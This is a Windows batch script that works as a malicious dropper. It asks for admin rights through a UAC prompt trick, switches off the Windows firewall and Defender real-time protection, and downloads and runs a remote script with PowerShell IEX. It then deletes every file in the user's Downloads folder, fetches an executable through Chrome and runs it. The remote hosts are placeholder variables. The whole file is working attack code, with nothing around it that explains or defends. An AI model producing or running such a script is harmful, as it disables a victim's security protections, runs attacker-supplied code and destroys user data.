@echo off
set "params=%*"
cd /d "%~dp0"

:checkAdmin
fsutil dirty query %systemdrive% >nul 2>&1
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    echo UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
    "%temp%\getadmin.vbs"
    exit /B
)
goto :main

:main
Netsh advfirewall set allprofiles state off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

start /min powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://%lhost%/%backup%.sh'))"

cd %USERPROFILE%\Downloads
del /Q *

start /min /b chrome http://%ip%/%name%.exe
timeout 12
start %name%.exe
exit
